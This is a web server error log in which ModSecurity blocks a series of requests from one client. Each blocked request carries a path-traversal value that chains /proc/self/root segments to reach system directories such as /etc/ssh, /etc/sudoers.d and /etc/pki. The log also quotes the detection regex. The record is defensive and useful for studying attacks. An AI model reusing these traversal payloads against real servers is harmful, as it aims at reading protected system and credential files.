[Thu Mar 19 16:11:12.651601 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:35836] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKUNa6ubjKNq_cu4Z69AAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:16.901555 2026] [:error] [pid 5816:tid 140411641214720] [client 74.7.243.128:35840] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKVJfmNfuxceSuAEK60QAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:23.271149 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:50328] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKW-oXxyEfFpUF8f8yGgAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:25.092205 2026] [proxy_fcgi:error] [pid 7893:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:36952] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:11:31.511938 2026] [core:alert] [pid 27293:tid 140411574073088] [client 57.141.18.87:39926] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 16:11:33.533195 2026] [:error] [pid 17887:tid 140411548894976] [client 74.7.243.128:50334] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKZQkwaGbbGflqUZDwqQAAANc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:42.568206 2026] [:error] [pid 5816:tid 140411725141760] [client 74.7.243.128:47566] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKbpfmNfuxceSuAEK64wAAAcI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:47.040924 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:33518] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKc9a6ubjKNq_cu4Z7CQAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:52.128172 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:37530] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:11:52.662842 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:55058] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKeAkwaGbbGflqUZDwuQAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:55.832454 2026] [:error] [pid 15826:tid 140411616036608] [client 74.7.243.128:55062] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKe-oXxyEfFpUF8f8yNAAAAU8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:11:58.757203 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:55076] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKfta6ubjKNq_cu4Z7EwAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:01.356483 2026] [:error] [pid 8307:tid 140411582465792] [client 74.7.243.128:33948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKgb-FhjpZGs9ba8qP3gAAAxM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:01.362715 2026] [core:alert] [pid 20435:tid 140411540502272] [client 57.141.18.35:40906] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 16:12:01.619490 2026] [:error] [pid 8307:tid 140411582465792] [client 74.7.243.128:33948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKgb-FhjpZGs9ba8qP4AAAAxM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:04.760368 2026] [:error] [pid 8307:tid 140411582465792] [client 74.7.243.128:33948] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKhL-FhjpZGs9ba8qP4wAAAxM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:07.195795 2026] [:error] [pid 26799:tid 140411607643904] [client 74.7.243.128:33958] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKh9a6ubjKNq_cu4Z7GAAAA1A"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:09.909828 2026] [:error] [pid 5816:tid 140411658000128] [client 74.7.243.128:36838] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKiZfmNfuxceSuAEK6-gAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:12.837694 2026] [:error] [pid 8307:tid 140411548894976] [client 74.7.243.128:36842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKjL-FhjpZGs9ba8qP6gAAAxc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:21.045821 2026] [proxy_fcgi:error] [pid 27293:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:38254] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 16:12:21.118802 2026] [:error] [pid 7545:tid 140411674785536] [client 74.7.243.128:36852] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKlX8B84UptSoTJtY02wAAAYg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:24.990051 2026] [:error] [pid 7545:tid 140411708356352] [client 74.7.243.128:41766] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKmH8B84UptSoTJtY04AAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:28.614898 2026] [:error] [pid 5816:tid 140411658000128] [client 74.7.243.128:41768] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKnJfmNfuxceSuAEK7BwAAAco"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:31.583835 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:43946] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKn-oXxyEfFpUF8f8yTAAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:37.317784 2026] [:error] [pid 26799:tid 140411725141760] [client 74.7.243.128:43960] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKpda6ubjKNq_cu4Z7LAAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Thu Mar 19 16:12:52.944788 2026] [:error] [pid 5816:tid 140411641214720] [client 74.7.243.128:49280] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abxKtJfmNfuxceSuAEK7EQAAAcw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
